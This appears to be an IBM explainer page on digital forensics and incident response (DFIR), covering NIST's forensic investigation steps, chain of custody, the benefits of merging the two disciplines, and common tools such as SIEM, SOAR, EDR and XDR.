Digital forensics and incident response, or DFIR, combines two cybersecurity fields to streamline threat response while preserving evidence against cybercriminals.
DFIR integrates two discrete cybersecurity disciplines: Digital forensics, the investigation of cyberthreats, primarily to gather digital evidence for litigating cybercriminals; and incident response, the detection and mitigation of cyberattacks in progress. Combining these two disciplines helps security teams stop threats faster, while preserving evidence that might otherwise be lost in the urgency of threat mitigation.
Get insights to better manage the risk of a data breach with the latest Cost of a Data Breach report.
Register for the X-Force Threat Intelligence Index
Digital forensics investigate and reconstructs cybersecurity incidents by collecting, analyzing and preserving digital evidence—traces left behind by threat actors, such as malware files and malicious scripts. These reconstructions allow investigators to pinpoint the root causes of attacks and identify the culprits.
Digital forensic investigations follow a strict chain of custody or formal process for tracking how evidence is gathered and handled. The chain of custody allows investigators to prove that evidence wasn’t tampered with. As a result, evidence from digital forensics investigations can be used for official purposes like court cases, insurance claims, and regulatory audits.
The National Institute of Standards and Technology (NIST) (link resides outside ibm.com) outlines four steps for digital forensic investigations:
After a breach, forensic investigators collect data from operating systems, user accounts, mobile devices and any other hardware and software assets that threat actors may have accessed. Common sources of forensic data include:
To preserve evidence integrity, investigators make copies of data before processing it. They secure the originals so that they cannot be altered and the rest of the investigation is carried out on the copies.
Investigators comb through the data for signs of cybercriminal activity, such as phishing emails, altered files and suspicious connections.
Investigators use forensic techniques to process, correlate, and extract insights from digital evidence. Investigators may also reference proprietary and open-source threat intelligence feeds to link their findings to specific threat actors.
Investigators compile a report that explains what happened during the security event and, if possible, identifies suspects or culprits. The report may contain recommendations for thwarting future attacks. It can be shared with law enforcement, insurers, regulators and other authorities.
Incident response focuses on detecting and responding to security breaches. The goal of incident response is to prevent attacks before they happen and to minimize the cost and business disruption of attacks that occur.
Incident response efforts are guided by incident response plans (IRP), which outline how the incident response team should deal with cyberthreats. The incident response process has six standard steps:
When digital forensics and incident response are conducted separately, they can interfere with one another. Incident responders can alter or destroy evidence while removing a threat from the network, and forensic investigators may delay threat resolution as they search for evidence. Information may not flow between these teams, making everyone less efficient than they could be.
DFIR fuses these two disciplines into a single process carried out by one team. This yields two important advantages:
Forensic data collection happens alongside threat mitigation. During the DFIR process, incident responders use forensic techniques to collect and preserve digital evidence while they’re containing and eradicating a threat. This ensures that the chain of custody is followed and valuable evidence isn’t altered or destroyed by incident response efforts.
Post-incident review includes examination of digital evidence. DFIR uses digital evidence to dive deeper into security incidents. DFIR teams examine and analyze the evidence they’ve gathered to reconstruct the incident from start to finish. The DFIR process ends with a report detailing what happened, how it happened, the full extent of the damage and how similar attacks can be avoided in the future.
Resulting benefits include:
In some companies, an in-house computer security incident response team (CSIRT), sometimes called a computer emergency response team (CERT), handles DFIR. CSIRT members may include the chief information security officer (CISO), security operations center (SOC) and IT staff, executive leaders and other stakeholders from across the company.
Many companies lack the resources to carry out DFIR on their own. In that case, they may hire third-party DFIR services that work on retainer.
Both in-house and third-party DFIR experts use the same DFIR tools to detect, investigate and resolve threats. These include:
Security information and event management (SIEM): SIEM collects and correlates security event data from security tools and other devices on the network.
Security orchestration, automation, and response (SOAR): SOAR enables DFIR teams to collect and analyze security data, define incident response workflows and automate repetitive or low-level security tasks.
Endpoint detection and response (EDR): EDR integrates endpoint security tools and uses real-time analytics and AI-driven automation to protect organizations against cyberthreats that get past antivirus software and other traditional endpoint security technologies.
Extended detection and response (XDR): XDR is an open cybersecurity architecture that integrates security tools and unifies security operations across all security layers—users, endpoints, email, applications, networks, cloud workloads and data. By eliminating visibility gaps between tools, XDR helps security teams to detect and resolve threats faster and more efficiently, limiting the damage that they cause.
Proactive threat hunting, continuous monitoring and a deep investigation of threats are just a few of the priorities facing an already busy IT department. Having a trusted incident response team on standby can reduce your response time, minimize the impact of a cyberattack, and help you recover faster.
The road to orchestrated incident response starts with empowering people, developing a consistent, repeatable process and then leveraging technology to execute. This guide outlines the key steps to building a robust incident response function.
A formal incident response plan enables cybersecurity teams to limit or prevent damage from cyberattacks or security breaches.
Security information and event management (SIEM) offers real-time monitoring and analysis of events as well as tracking and logging of security data for compliance or auditing purposes.
Threat intelligence is detailed, actionable threat information for preventing and fighting cyberthreats targeting an organization.
Ransomware holds victims' devices and data hostage until a ransom is paid. Learn how ransomware works, why it has proliferated in recent years, and how organizations defend against it.